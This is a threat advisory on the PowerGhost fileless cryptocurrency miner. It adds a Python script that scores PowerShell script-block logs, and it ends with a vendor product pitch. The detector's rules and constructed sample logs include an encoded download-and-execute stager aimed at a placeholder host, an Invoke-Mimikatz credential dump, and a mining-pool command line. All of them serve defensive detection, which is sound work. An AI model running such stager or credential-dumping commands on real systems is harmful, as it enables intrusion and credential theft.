A fileless cryptocurrency miner dubbed PowerGhost is compromising workstations and servers by using the EternalBlue exploit and Mimikatz. The threat compromises a single computer on a targeted network and may then spread to other systems and servers across the organization. PowerGhost was first seen compromising organizations in India, Colombia, Turkey, Europe, and the US.
The threat arrives through exploits or remote administration tools and is an obfuscated PowerShell script with add-on modules for mining. A device compromised by PowerGhost uses the EternalBlue exploit to spread across the network and uses Mimikatz to steal account credentials, resulting in privilege escalation through CVE-2018-8120. Compromised devices hijack the central processing unit in order to mine cryptocurrency, and the threat may also be used to launch distributed denial-of-service (DDoS) attacks.
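Because the threat lives in memory as obfuscated PowerShell, file-based antivirus has little to inspect; PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational channel) records the de-obfuscated script text and is the most direct place to look. The following is an added example, not code from the advisory or from Binary Defense, that scores constructed 4104-style log lines for the behaviours described above: an encoded or in-memory launcher, reflective loading, Mimikatz credential theft, and a miner pointed at a mining pool. The rule names, weights, threshold and sample lines are this example's own assumptions and are not PowerGhost indicators.

```python
"""Score PowerShell script-block log text for fileless-miner behaviours.

Added example (not from the advisory). The sample log lines are constructed;
none of the strings below are real PowerGhost artifacts.
"""
import base64
import re

# Each rule: (name, compiled regex, weight). Weights are illustrative choices.
RULES = [
    ("encoded_command", re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("download_to_memory", re.compile(r"(DownloadString|IEX|Invoke-Expression)", re.I), 2),
    ("reflective_load", re.compile(r"\[System\.Reflection\.Assembly\]::Load", re.I), 3),
    ("mimikatz", re.compile(r"Invoke-Mimikatz|sekurlsa::", re.I), 5),
    ("mining_pool", re.compile(r"stratum\+tcp://|xmrig|cryptonight", re.I), 5),
]
ALERT_THRESHOLD = 5  # illustrative; tune against your own baseline


def decode_encoded_command(text):
    """If the line carries a -EncodedCommand payload, return its UTF-16LE
    decoding so the other rules can inspect the hidden script; else ''."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", text, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def score_script_block(text):
    """Return (score, [matched rule names]) for one script block entry.
    Both the raw text and any decoded -EncodedCommand payload are inspected."""
    haystack = text + "\n" + decode_encoded_command(text)
    score, hits = 0, []
    for name, pattern, weight in RULES:
        if pattern.search(haystack):
            score += weight
            hits.append(name)
    return score, hits


def triage(log_lines):
    """Return entries whose score reaches ALERT_THRESHOLD, highest score first."""
    findings = []
    for line in log_lines:
        score, hits = score_script_block(line)
        if score >= ALERT_THRESHOLD:
            findings.append({"line": line, "score": score, "rules": hits})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


# Constructed sample: an in-memory stager hidden behind -EncodedCommand, built
# here at runtime so the example stays self-contained. The URL is a placeholder.
_HIDDEN = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/m.ps1')"
_ENC = base64.b64encode(_HIDDEN.encode("utf-16-le")).decode()

SAMPLE_LOG = [  # constructed 4104-style entries, not real events
    "4104 ScriptBlockText: Get-Service | Where-Object {$_.Status -eq 'Running'}",
    f"4104 ScriptBlockText: powershell.exe -NoP -W Hidden -enc {_ENC}",
    "4104 ScriptBlockText: [System.Reflection.Assembly]::Load($bytes); Invoke-Mimikatz -DumpCreds",
    "4104 ScriptBlockText: Start-Process $miner -ArgumentList '-o stratum+tcp://pool.example.invalid:3333'",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"score={f['score']:>2} rules={','.join(f['rules'])}\n    {f['line'][:90]}")
```

The benign `Get-Service` line scores 0, while the encoded launcher only crosses the threshold because its payload is decoded and re-scanned; without that step the launcher looks like any other command line with a long argument. In production the input would come from the 4104 events exported from the Operational log (script block logging must be enabled by policy), and the CPU-hijacking stage described in the advisory is better caught by a separate check on sustained high CPU from a process spawned by PowerShell than by text matching alone.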
This is a high-priority threat that is actively being used in the wild. Binary Defense customers can protect themselves by keeping their software fully patched and by using the latest Binary Defense security solutions, such as Vision Endpoint Detection and Response (EDR), to protect their brand, their data, and their enterprise from fileless malware.